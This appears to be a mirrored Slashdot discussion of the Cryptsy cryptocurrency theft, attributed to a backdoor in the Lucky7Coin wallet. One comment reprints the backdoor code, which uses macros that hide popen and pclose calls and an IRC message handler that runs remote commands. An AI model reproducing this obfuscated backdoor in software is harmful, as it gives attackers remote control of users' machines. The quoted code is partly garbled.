Slashdot Mirror
Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com)
An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.
Crypto currencies are like the wild wild west of monetary transactions. Unless you are doing something that requires absolute discretion, it's really not worth the risk.
(voice of Nelson)
This issue is a bit more complicated than you think.
Must be a slow news day...
Well, as the current Litecoin value is around $3, I dont think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?
This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.
Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them s going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.
I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Just cruising through this digital world at 33 1/3 rpm...
Blames Backdoor In the Code of a Wallet
Or maybe it was bad security.
Don't waste your vote! Vote for whoever you want, unless you live in a swing state it won't matter anyways
I'm more shocked to learn that Litecoin went as up as $9.50.
A wallet is a non-executable data file.
You can't get a trojan from on.
Unless you're retarded and use a third party service or program to MANAGE wallets.
https://github.com/alerj78/luc...
dooglus commented on Mar 8, 2015
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
#define S_ORDER(a,b,c,d) b##a##d##c
* OS-dependent memory page locking/unlocking.
* Defined as policy class to make stubbing for test possible.
*/
#define CLine S_ORDER(I,F,E,L)
* Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
* std::allocator templates.
*/
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) :%s\r", CBuff, pszName, result.c_str()).c_str());
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s
}
}
I expect this is a known issue since this kind of thing doesn't happen accidentally.
Anons need not reply. Questions end with a question mark.
Fiat currency A --> bitcoins --> wallet --> backdoor --> El Chapo
It little behooves the best of us to comment on the rest of us.
It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was a social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.
'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
Bitcoin is primarily for illegal activity right now.
fast, low fee, guaranteed.
Because what I want is to have to pay someone else to use my "money".
Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
Meanwhile.... 2.39% of my "realcoin" disappeared on Wall Street today...
Unless you mean someone accessed your account and transferred out 2.39% of your fiat then no, you analogy is wrong. Price fluctuation != Coins/Fiat leaving your account. With price fluctuation nothing is lost unless you sell. Without a sale that down 2.39% is trivia, just like the up 2.xx% the day before.
That is true if it is a pure investment, but not if it is a currency. Are you attempting to agree that cryptocurrency is so awful as currency, that it is not reliably spendable?
Stocks are not supposed to be liquid assets. Currency is. If you have to wait to spend it in order to not lose money, it is not liquid, and is therefore a complete failure as a currency.
Stocks are intended as shared ownership of a company, there are real reasons why that is on a different time scale than currency. When I used a financial adviser, I was told not to invest in the stock market unless I was willing to wait at least 8 years to sell and get my money back, because you don't want to sell during a recession. And when approaching retirement, I was advised to plan to shift into more liquid investments not less than 8 years before I would need to access the money.
If we were talking about cryptobonds it would be a different discussion than it is for cryptocurrency.
Floriculture, the raising of flowers for sale, is a $100 billion a year business. That includes tulips. Just because tulips were overpriced once upon a time, or dotcom stocks or real estate more recently, does not mean they have no value.
> Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Actually, you pay for that piece of paper over time, because the Treasury Department has to keep printing new ones to replace the ones that wear out, and printing and distributing cash costs money. It's buried in your federal taxes. Also, paper money isn't untraceable. Large bills go through readers that record the serial numbers, and can link that to who deposited or withdrew it. So if you got your $10 at a cash machine, and the person who you gave it to put it back in another bank, they can figure out who made a transaction with who. Generally they don't bother to track $10 transactions, but pull out or deposit thousands in cash, and you can bet they track it.
Bitcoin was designed as electronic cash, it says so on the original white paper. It was designed to overcome the locality limitations of paper money. Try sending $10 in cash from the US to Indonesia in under an hour. With the Bitcoin Network you can do that. With Western Union, not so much.
That exact calculation was done by the Silk Road prosecutors, so we know that 4% of bitcoin transactions were for drugs during the time that marketplace was operating. Whereas for the world economy in general, illegal drugs account for 3% of GDP. It's not an entirely different picture, it's the same picture.